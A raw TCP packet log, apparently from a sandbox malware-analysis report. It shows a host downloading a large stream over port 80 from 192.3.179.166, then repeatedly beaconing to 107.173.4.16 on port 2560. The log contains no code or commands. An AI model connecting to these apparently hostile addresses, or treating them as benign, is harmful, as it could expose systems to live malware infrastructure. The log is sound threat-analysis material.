                                                                              Dec 16, 2024 17:30:30.094707012 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.094712019 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.094736099 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.094753027 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.096364975 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.096401930 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.096642971 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.098182917 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.098218918 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.098253965 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.098284960 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.099849939 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.099900961 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.099929094 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.099941015 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.101599932 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.101635933 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.101660967 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.101670980 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.101680040 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.101718903 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.103364944 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.103400946 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.103713036 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.105128050 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.105164051 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.105191946 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.105226040 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.106873035 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.106908083 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.106935024 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.106949091 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.108599901 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.108634949 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.108669996 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.108695030 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.110729933 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.110764980 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.110797882 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.110800028 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.110817909 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.110846043 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.112148046 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.112181902 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.112215996 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.112231016 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.113888025 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.113923073 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.113955975 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.113972902 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.115680933 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.115715027 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.115745068 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.115761042 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.117415905 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.117466927 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.117476940 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.117500067 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.117517948 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.117547035 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.119163990 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.119199038 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.119225979 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.119242907 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.120899916 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.120934963 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.120951891 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.121010065 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.122658014 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.122693062 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.122737885 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.122756004 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.124499083 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.124533892 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.124557972 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.124574900 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.126133919 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.126171112 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.126198053 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.126204014 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.126221895 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.126252890 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.128024101 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.128060102 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.128084898 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.128128052 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.129790068 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.129825115 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.129872084 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.129872084 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.131670952 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.131705999 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.131804943 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.133177996 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.133213997 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.133243084 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.133246899 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.133277893 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.133306980 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.134995937 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.135031939 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.135062933 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.135093927 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.136874914 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.136909962 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.136956930 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.136989117 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.138458967 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.138494968 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.138519049 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.138547897 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.140234947 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.140269995 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.140325069 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.140325069 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.141957998 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.141992092 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.142024994 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.142029047 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.142055988 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.142085075 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.143872023 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.143906116 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.143940926 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.143970966 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.145524025 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.145559072 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.145589113 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.145629883 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.147308111 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.147356033 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.147376060 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.147407055 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.149060011 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.149095058 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.149122953 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.149127007 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.149147987 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.149209976 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.150778055 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.150813103 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.150840998 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.150856972 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.152642012 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.152676105 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.152705908 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.152720928 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.154213905 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.154248953 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.154273987 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.154292107 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.156039000 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.156075001 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.156086922 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.156121016 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.157716990 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.157753944 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.157785892 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.157803059 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:30.272198915 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:30.272305012 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:33.927119017 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:33.927190065 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:35.415366888 CET497312560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:30:35.535547972 CET256049731107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:30:35.535656929 CET497312560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:30:36.164540052 CET497312560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:30:36.284681082 CET256049731107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:30:36.299196959 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:37.463282108 CET256049731107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:30:37.463478088 CET497312560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:30:37.463635921 CET497312560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:30:37.583549023 CET256049731107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:30:38.624834061 CET497322560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:30:38.745584011 CET256049732107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:30:38.745721102 CET497322560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:30:38.749229908 CET497322560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:30:38.869273901 CET256049732107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:30:40.729017973 CET256049732107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:30:40.729167938 CET497322560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:30:40.774538994 CET497322560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:30:40.894982100 CET256049732107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:30:41.789022923 CET497342560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:30:41.912272930 CET256049734107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:30:41.912384987 CET497342560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:30:41.916214943 CET497342560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:30:42.038461924 CET256049734107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:30:43.911879063 CET256049734107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:30:43.911956072 CET497342560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:30:43.912056923 CET497342560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:30:44.034734011 CET256049734107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:30:44.930655003 CET497372560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:30:45.050950050 CET256049737107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:30:45.051054001 CET497372560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:30:45.055526972 CET497372560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:30:45.175370932 CET256049737107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:30:46.979340076 CET256049737107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:30:46.979533911 CET497372560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:30:46.979533911 CET497372560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:30:47.100043058 CET256049737107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:30:47.991192102 CET497402560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:30:48.111119986 CET256049740107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:30:48.111217976 CET497402560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:30:48.115581036 CET497402560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:30:48.236790895 CET256049740107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:30:50.058232069 CET256049740107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:30:50.058327913 CET497402560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:30:50.058432102 CET497402560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:30:50.179126978 CET256049740107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:30:51.087265015 CET497422560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:30:51.207072973 CET256049742107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:30:51.207170963 CET497422560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:30:51.229173899 CET497422560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:30:51.349421024 CET256049742107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:30:53.194998980 CET256049742107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:30:53.199623108 CET497422560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:30:53.199775934 CET497422560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:30:53.320152044 CET256049742107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:30:54.443844080 CET497432560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:30:54.564065933 CET256049743107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:30:54.564161062 CET497432560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:30:54.568018913 CET497432560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:30:54.687915087 CET256049743107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:30:56.514585018 CET256049743107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:30:56.518752098 CET497432560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:30:56.518881083 CET497432560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:30:56.639053106 CET256049743107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:30:57.523957968 CET497442560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:30:57.643933058 CET256049744107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:30:57.644047022 CET497442560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:30:57.647989035 CET497442560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:30:57.767961025 CET256049744107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:30:59.592771053 CET256049744107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:30:59.594116926 CET497442560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:30:59.594197989 CET497442560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:30:59.714679956 CET256049744107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:31:00.600841999 CET497452560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:31:00.721206903 CET256049745107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:31:00.721343994 CET497452560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:31:00.889511108 CET497452560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:31:01.009511948 CET256049745107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:31:02.738213062 CET256049745107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:31:02.738356113 CET497452560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:31:02.738492966 CET497452560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:31:02.858472109 CET256049745107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:31:03.741116047 CET497462560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:31:03.861228943 CET256049746107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:31:03.861393929 CET497462560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:31:04.643393993 CET497462560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:31:04.763240099 CET256049746107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:31:05.840416908 CET256049746107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:31:05.840521097 CET497462560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:31:05.840657949 CET497462560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:31:05.961941004 CET256049746107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:31:06.850752115 CET497472560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:31:06.972071886 CET256049747107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:31:06.972193956 CET497472560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:31:07.625154018 CET497472560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:31:07.745110035 CET256049747107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:31:08.903605938 CET256049747107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:31:08.903924942 CET497472560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:31:08.903924942 CET497472560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:31:09.023849964 CET256049747107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:31:09.912810087 CET497482560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:31:10.032773972 CET256049748107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:31:10.032948971 CET497482560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:31:10.228058100 CET497482560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:31:10.347985983 CET256049748107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:31:12.005547047 CET256049748107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:31:12.005672932 CET497482560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:31:12.005774975 CET497482560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:31:12.126813889 CET256049748107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:31:13.006844997 CET497492560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:31:13.126965046 CET256049749107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:31:13.127074957 CET497492560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:31:13.348562002 CET497492560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:31:13.475146055 CET256049749107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:31:15.057789087 CET256049749107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:31:15.057924032 CET497492560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:31:15.058074951 CET497492560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:31:15.178133011 CET256049749107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:31:16.069214106 CET497502560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:31:16.191977978 CET256049750107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:31:16.192110062 CET497502560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:31:16.405455112 CET497502560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:31:16.771759987 CET497502560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:31:16.907994986 CET256049750107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:31:16.908030033 CET256049750107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:31:18.120377064 CET256049750107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:31:18.120444059 CET497502560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:31:18.120537043 CET497502560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:31:18.240844965 CET256049750107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:31:19.132112980 CET497522560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:31:19.252466917 CET256049752107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:31:19.252564907 CET497522560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:31:19.612217903 CET497522560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:31:19.732279062 CET256049752107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:31:21.183713913 CET256049752107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:31:21.183830976 CET497522560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:31:21.183978081 CET497522560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:31:21.303704023 CET256049752107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:31:22.197639942 CET497582560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:31:22.318794966 CET256049758107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:31:22.318909883 CET497582560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:31:22.324173927 CET497582560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:31:22.443929911 CET256049758107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:31:24.261991978 CET256049758107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:31:24.262125969 CET497582560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:31:24.262660980 CET497582560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:31:24.382483959 CET256049758107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:31:25.360076904 CET497652560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:31:25.480005980 CET256049765107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:31:25.480108023 CET497652560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:31:25.484030008 CET497652560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:31:25.604892015 CET256049765107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:31:27.417535067 CET256049765107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:31:27.417659044 CET497652560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:31:27.417800903 CET497652560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:31:27.537512064 CET256049765107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:31:28.429014921 CET497762560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:31:28.548902988 CET256049776107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:31:28.549057007 CET497762560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:31:28.823483944 CET497762560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:31:28.943353891 CET256049776107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:31:30.480019093 CET256049776107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:31:30.480123997 CET497762560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:31:30.480362892 CET497762560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:31:30.600857019 CET256049776107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:31:31.491480112 CET497822560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:31:31.612986088 CET256049782107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:31:31.613353968 CET497822560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:31:31.822324038 CET497822560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:31:31.942470074 CET256049782107.173.4.16192.168.2.4
